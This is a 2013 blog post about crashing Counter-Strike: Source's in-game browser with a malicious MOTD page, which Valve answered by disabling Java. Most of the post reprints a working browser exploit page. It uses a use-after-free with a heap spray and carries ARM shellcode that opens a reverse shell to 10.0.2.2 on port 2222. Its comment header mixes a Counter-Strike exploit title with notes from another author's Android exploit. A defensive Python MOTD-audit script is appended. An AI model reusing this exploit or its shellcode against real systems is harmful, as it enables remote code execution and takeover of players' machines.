
Friday, March 22, 2013

Valve Steam Counter Strike Source Bug Hunting


Sometimes I play Counter-Strike: Source. Years ago I thought that its built-in webserver/browser was vulnerable, but I never tested it. Now I know much more about debugging, exploits, stack smashing … Then I found this Android browser exploit and wanted to test it on the CSS webserver.

Put motd.txt into the Steam folder, start Counter-Strike, and start a local game. The game loads the MOTD, and then the game crashed instantly with an error message I don't know. I didn't think it would get fixed so fast :) But I think it was a buffer overflow message, out of range or something else. It was very late ...

An update to Counter-Strike: Source has been released.

The update will be applied automatically when you restart Counter-Strike: Source.

The major changes include:
# Disabled Java for the in-game web browser ("Thanks Valve for removing crap Java ;)")

1 day later it got fixed by disabling Java plugins … hrhr

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Cstrike MOTD</title>
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
}
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
text-decoration: underline;
}
a:link {
color: #FFFFFF;
}
a:visited {
color: #FFFFFF;
}
a:active {
color: #FFFFFF;
}
a:hover {
color: #FFFFFF;
text-decoration: underline;
}
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike: Source
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
</pre>
</body>
</html>

<html>
<!--
# Exploit Title: Counter-Strike: Source motd_css_poc.txt BOF
# Date: 2013/19/03
# Author: cr4shyyy
# Software Link: http://store.steampowered.com/app/240/
# Version: < before 20.03.2013
# Tested on: Windows
# CVE :
# Just tested whether it works with the Steam built-in webserver, and it crashed. I can't test it more, can't Olly it. An update to Counter-Strike: Source has been released. The update will be applied automatically when you restart Counter-Strike: Source. The major changes include:
# Disabled Java for the in-game web browser ("Thanks Valve for removing crap Java ;)")

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("A")); };


var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\u3a0\u8d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length<=0x1000);

scode2 += shell


target = new Array();
for(i = 0; i < 300; i++){

if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}

document.write(target[i]);
document.write("<br />");
if (i>250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
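
The stock MOTD above is static markup, while the test page relies on a script block, an `onload` handler and long runs of `\u` escapes. A static check for exactly that difference, as an added example that is not part of the original post (the names `ACTIVE_TAGS`, `MotdAudit` and `audit_motd`, the tag list and the threshold of eight escapes are assumptions; both sample pages are constructed and carry only filler):

```python
import re
from html.parser import HTMLParser

# Elements that run code or load plugins (assumed list, not from the post).
ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}
# Eight or more consecutive backslash-u escapes (assumed threshold).
ESCAPE_RUN = re.compile(r"(?:\\u[0-9a-fA-F]{1,4}){8,}")

class MotdAudit(HTMLParser):
    """Records constructs a static MOTD page has no reason to contain."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}>")
        self._in_script = self._in_script or tag == "script"
        # Inline handlers (onload, onclick, ...) run code without a script tag.
        self.findings += [f"event handler {n} on <{tag}>"
                          for n, _ in attrs if n.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)

def audit_motd(html_text):
    """Return a list of findings; an empty list means plain static markup."""
    parser = MotdAudit()
    parser.feed(html_text)
    parser.close()
    if ESCAPE_RUN.search("".join(parser.script_text)):
        parser.findings.append("long \\u escape run inside script")
    return parser.findings

# Constructed samples: a static page like the stock MOTD, and a scripted page with filler only.
STOCK_MOTD = ('<html><head><title>Cstrike MOTD</title></head><body scroll="no"><pre>'
              '<a href="http://www.counter-strike.net">Visit</a></pre></body></html>')
SCRIPTED_MOTD = ('<html><head><script>function heap() { var s = unescape("' + "\\u4141" * 16
                 + '"); }</script></head><body onload=heap()><p id=target></p></body></html>')

if __name__ == "__main__":
    for label, page in (("stock", STOCK_MOTD), ("scripted", SCRIPTED_MOTD)):
        print(label, audit_motd(page) or "clean")
```

A server operator can run `audit_motd` over a motd.txt before deploying it; any finding means the page is no longer plain text and links.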
